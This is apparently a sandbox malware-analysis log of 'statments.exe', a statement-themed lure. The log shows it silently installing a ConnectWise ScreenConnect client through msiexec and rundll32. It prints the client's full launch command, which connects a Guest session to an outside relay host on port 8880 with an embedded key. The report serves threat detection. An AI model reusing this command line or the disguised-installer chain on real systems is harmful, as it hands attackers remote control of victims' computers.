                              Source: statments.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              barindex
                              Source: statments.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051B2640 CreateProcessAsUserW,8_2_051B2640
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4d36d8.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C18.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C77.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3F66.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4d36da.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4d36da.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\mzzeov43.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\mzzeov43.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI3C77.tmpJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_011895791_2_01189579
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_011858371_2_01185837
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_055F6F001_2_055F6F00
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_055F9F001_2_055F9F00
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_055F60C01_2_055F60C0
                              Source: C:\Users\user\Desktop\statments.exeCode function: 1_2_055F6EF11_2_055F6EF1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_00CFD5888_2_00CFD588
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051B00408_2_051B0040
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_051B00408_2_051B0040
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4A8B70D810_2_00007FFB4A8B70D8
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4A8B10D710_2_00007FFB4A8B10D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4A8B10CF10_2_00007FFB4A8B10CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC5BC110_2_00007FFB4ABC5BC1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC628310_2_00007FFB4ABC6283
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC5DD410_2_00007FFB4ABC5DD4
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC5C6A10_2_00007FFB4ABC5C6A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4ABC680910_2_00007FFB4ABC6809
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4A8F70D811_2_00007FFB4A8F70D8
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4A8F10D711_2_00007FFB4A8F10D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4A8F10CF11_2_00007FFB4A8F10CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC0033F11_2_00007FFB4AC0033F
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC0E34311_2_00007FFB4AC0E343
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC0F11211_2_00007FFB4AC0F112
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FFB4AC06DD311_2_00007FFB4AC06DD3
                              Source: statments.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statments.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statments.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statments.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statments.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statments.exe, 00000001.00000000.1521771269.000000000094F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.000000000094F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1565481069.00000000058FC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1565481069.00000000058FC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs statments.exe
                              Source: statments.exe, 00000001.00000002.1565481069.00000000058FC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs statments.exe
                              Source: statments.exe, 00000001.00000002.1565481069.00000000058FC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1563323029.0000000005240000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1564198398.0000000005440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs statments.exe
                              Source: statments.exe, 00000001.00000002.1564198398.0000000005440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs statments.exe
                              Source: statments.exe, 00000001.00000002.1564198398.0000000005440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1552791044.0000000003DB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1568296454.0000000006980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statments.exe
                              Source: statments.exe, 00000001.00000002.1568296454.0000000006980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs statments.exe
                              Source: statments.exe, 00000001.00000002.1568296454.0000000006980000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs statments.exe
                              Source: statments.exe, 00000001.00000002.1549362191.0000000001230000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statments.exe
                              Source: statments.exe, 00000001.00000002.1562962459.0000000005200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenamezlib.dll2 vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenamewixca.dll\ vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statments.exe
                              Source: statments.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statments.exe
                              Source: statments.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.0.statments.exe.4ac3d8.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 1.2.statments.exe.5240000.5.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: 1.0.statments.exe.4ac3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 1.0.statments.exe.4ac3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 1.0.statments.exe.4ac3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: classification engineClassification label: mal42.evad.winEXE@17/56@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                              Source: C:\Users\user\Desktop\statments.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\statments.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\statments.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: statments.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: statments.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\statments.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2F66.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5058640 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: statments.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: statments.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\statments.exeFile read: C:\Users\user\Desktop\statments.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\statments.exe "C:\Users\user\Desktop\statments.exe"
                              Source: C:\Users\user\Desktop\statments.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AB83296B808D1A3E5D9792E4DDFA12DB C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2F66.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5058640 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 28425576B87BE497C2D29F2837F582DA
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E415C9D2D8304B77F88CF36FA73BEA3D E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=Java&c=&c=IT&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f60a8250-1d8c-4e56-b41b-ff082dd1b17d" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f69440ce-931d-49a5-a5c7-2a17bc772f20" "System"
                              Source: C:\Users\user\Desktop\statments.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AB83296B808D1A3E5D9792E4DDFA12DB CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 28425576B87BE497C2D29F2837F582DAJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E415C9D2D8304B77F88CF36FA73BEA3D E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2F66.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5058640 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f60a8250-1d8c-4e56-b41b-ff082dd1b17d" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "f69440ce-931d-49a5-a5c7-2a17bc772f20" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
